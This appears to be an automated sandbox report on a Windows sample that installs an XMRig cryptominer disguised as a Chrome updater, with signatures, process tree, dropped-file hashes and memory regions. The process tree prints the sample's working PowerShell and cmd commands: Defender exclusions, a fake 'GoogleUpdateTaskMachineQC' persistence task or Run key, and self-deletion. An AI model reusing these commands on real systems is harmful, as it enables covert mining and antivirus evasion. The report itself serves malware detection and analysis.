Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1798s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/M8xUNW42QxTLMRXN.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3440
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:656
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:2996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:1460
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:4600
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:4252
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
          PID:2544
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:3164
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          1⤵
            PID:2768
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:456
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:4532
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:2916

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            1.7MB

            MD5

            f88cd94d359bf926964bab716c345705

            SHA1

            f2d69c0ea52a9cd8356e7340c43fe4c09430f8eb

            SHA256

            50676d957ab3aa41bd6009931da212d8c2a40d7492a4d11c17475134c274e7e6

            SHA512

            a38a06e9ec327bb3ca46af72396d048f21065ccaedd540a34f260ed5c51bc85a731ee5b766557ad0b86722c31d3e3c234081deee78f013020ceebfd3ce00f24b

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            403KB

            MD5

            2b58a1d5540ff1b7125a510d1dc11c6c

            SHA1

            35277b8dd22a4207ff92ead49059094ae2187e15

            SHA256

            4fc338edebbf4a41b0a6f77b9bb7272cf9b4331874abf05ed49cc2b02459e81c

            SHA512

            f6e4138e9a43e7a050512f267d2fcc5904e0000e3a5d94a9591b68a6f210c1bc3a31a811e34dfc95db2ff4841e95ef469b6045b66ef7d3f4be7777da67cf203c

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            2e907f77659a6601fcc408274894da2e

            SHA1

            9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

            SHA256

            385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

            SHA512

            34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            7661d0b4dc733b10a8f401452d63128d

            SHA1

            b374bb6f3860ac70574f282738c7f456fbe2c33d

            SHA256

            f6f4442564ab77163d4d1ffffc74c3d714102979ee9e075c5235174c6e5761db

            SHA512

            788fad8d0684cccc776c41203df09335977cc67ed2e58c6d785eef9d38a33c1fa30d64360a88ff3d4603fa8dfe0f080e2279987c1e556db53d2bb8a38c047d0d

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ipbecldw.3l4.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/456-53-0x00007FF788600000-0x00007FF788811000-memory.dmp
            Filesize

            2.1MB

          • memory/456-123-0x00007FF788600000-0x00007FF788811000-memory.dmp
            Filesize

            2.1MB

          • memory/656-34-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/656-31-0x000001F07EE20000-0x000001F07EE30000-memory.dmp
            Filesize

            64KB

          • memory/656-32-0x000001F07EE20000-0x000001F07EE30000-memory.dmp
            Filesize

            64KB

          • memory/656-29-0x000001F07EE20000-0x000001F07EE30000-memory.dmp
            Filesize

            64KB

          • memory/656-30-0x000001F07EE20000-0x000001F07EE30000-memory.dmp
            Filesize

            64KB

          • memory/656-27-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/1460-113-0x000001FAF9F00000-0x000001FAF9F10000-memory.dmp
            Filesize

            64KB

          • memory/1460-116-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/1460-114-0x000001FAF9F00000-0x000001FAF9F10000-memory.dmp
            Filesize

            64KB

          • memory/1460-112-0x00007FF4E4CC0000-0x00007FF4E4CD0000-memory.dmp
            Filesize

            64KB

          • memory/1460-100-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/1460-102-0x000001FAF9F00000-0x000001FAF9F10000-memory.dmp
            Filesize

            64KB

          • memory/1460-101-0x000001FAF9F00000-0x000001FAF9F10000-memory.dmp
            Filesize

            64KB

          • memory/2108-13-0x000002385E990000-0x000002385E9A0000-memory.dmp
            Filesize

            64KB

          • memory/2108-12-0x000002385E990000-0x000002385E9A0000-memory.dmp
            Filesize

            64KB

          • memory/2108-11-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/2108-16-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/2108-1-0x000002385EBE0000-0x000002385EC02000-memory.dmp
            Filesize

            136KB

          • memory/2544-145-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-157-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-189-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-187-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-185-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-183-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-181-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-179-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-177-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-175-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-173-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-171-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-169-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-167-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-165-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-163-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-161-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-159-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-155-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-125-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-124-0x000001EFC0D30000-0x000001EFC0D50000-memory.dmp
            Filesize

            128KB

          • memory/2544-153-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-151-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-126-0x000001EFC1310000-0x000001EFC1330000-memory.dmp
            Filesize

            128KB

          • memory/2544-128-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-149-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-129-0x000001EFC1350000-0x000001EFC1370000-memory.dmp
            Filesize

            128KB

          • memory/2544-130-0x000001EFC1330000-0x000001EFC1350000-memory.dmp
            Filesize

            128KB

          • memory/2544-132-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-147-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-134-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-135-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-137-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-139-0x000001EFC1330000-0x000001EFC1350000-memory.dmp
            Filesize

            128KB

          • memory/2544-138-0x000001EFC1350000-0x000001EFC1370000-memory.dmp
            Filesize

            128KB

          • memory/2544-141-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2544-143-0x00007FF6BFDA0000-0x00007FF6C0594000-memory.dmp
            Filesize

            8.0MB

          • memory/2996-79-0x0000020965D90000-0x0000020965DAC000-memory.dmp
            Filesize

            112KB

          • memory/2996-80-0x0000020965D70000-0x0000020965D7A000-memory.dmp
            Filesize

            40KB

          • memory/2996-64-0x00000209637F0000-0x0000020963800000-memory.dmp
            Filesize

            64KB

          • memory/2996-88-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/2996-81-0x0000020965DD0000-0x0000020965DEA000-memory.dmp
            Filesize

            104KB

          • memory/2996-84-0x0000020965DC0000-0x0000020965DCA000-memory.dmp
            Filesize

            40KB

          • memory/2996-75-0x00007FF438700000-0x00007FF438710000-memory.dmp
            Filesize

            64KB

          • memory/2996-85-0x00000209637F0000-0x0000020963800000-memory.dmp
            Filesize

            64KB

          • memory/2996-83-0x0000020965DB0000-0x0000020965DB6000-memory.dmp
            Filesize

            24KB

          • memory/2996-74-0x00000209637C0000-0x00000209637DC000-memory.dmp
            Filesize

            112KB

          • memory/2996-82-0x0000020965D80000-0x0000020965D88000-memory.dmp
            Filesize

            32KB

          • memory/2996-76-0x00000209637F0000-0x0000020963800000-memory.dmp
            Filesize

            64KB

          • memory/2996-63-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/2996-77-0x0000020965B70000-0x0000020965C25000-memory.dmp
            Filesize

            724KB

          • memory/2996-78-0x00000209637E0000-0x00000209637EA000-memory.dmp
            Filesize

            40KB

          • memory/4252-133-0x00007FF789AC0000-0x00007FF789AD6000-memory.dmp
            Filesize

            88KB

          • memory/4252-127-0x00007FF789AC0000-0x00007FF789AD6000-memory.dmp
            Filesize

            88KB

          • memory/4420-0-0x00007FF781770000-0x00007FF781981000-memory.dmp
            Filesize

            2.1MB

          • memory/4420-36-0x00007FF781770000-0x00007FF781981000-memory.dmp
            Filesize

            2.1MB

          • memory/4620-52-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/4620-46-0x00007FFC31460000-0x00007FFC31F21000-memory.dmp
            Filesize

            10.8MB

          • memory/4620-47-0x000001F44F260000-0x000001F44F270000-memory.dmp
            Filesize

            64KB

          • memory/4620-48-0x000001F44F260000-0x000001F44F270000-memory.dmp
            Filesize

            64KB